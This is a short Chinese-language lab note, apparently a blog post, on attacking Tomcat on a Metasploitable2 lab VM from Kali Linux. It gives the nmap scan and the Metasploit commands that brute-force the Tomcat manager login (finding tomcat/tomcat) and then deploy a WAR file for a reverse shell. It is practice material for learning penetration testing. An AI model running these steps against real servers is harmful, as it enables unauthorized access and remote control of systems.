kali linux对Metasploitable2漏洞利用,tomcat管理用户爆力破解/利用tomcat upload 功能反弹shel笔记

Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。默认情况下,8180端口是tomcat管理的HTTP端口

实验环境:

攻击机:kali linux 
ip:192.168.172.134
目标机:Metasploittable2
ip:192.168.172.129

攻击过程1:

step1:探测

nmap 192.168.172.129

nmap -sV -o  192.168.172.129

 

step2:爆破

启动msf

命令:use auxiliary/scanner/http/tomcat_mgr_login

show options 

set rhosts 192.168.172.129

set rport 8180

run

爆破成功,用户密码为:tomcat /tomcat

攻击过程2:

step1:探测略

step2:漏洞利用

启动msf

命令:use exploit/multi/http/tomcat_mgr_deploy

show options

set httpusername tomcat          //指定用户名

set httppassword tomcat         //指定用户密码

set rhosts 192.168.172.129

set rport 8180

exploit

漏洞利用成功。

漏洞利用的原理就是上传一个war文件,然后反弹shell。

你可能感兴趣的:(kali linux对Metasploitable2漏洞利用,tomcat管理用户爆力破解/利用tomcat upload 功能反弹shel笔记)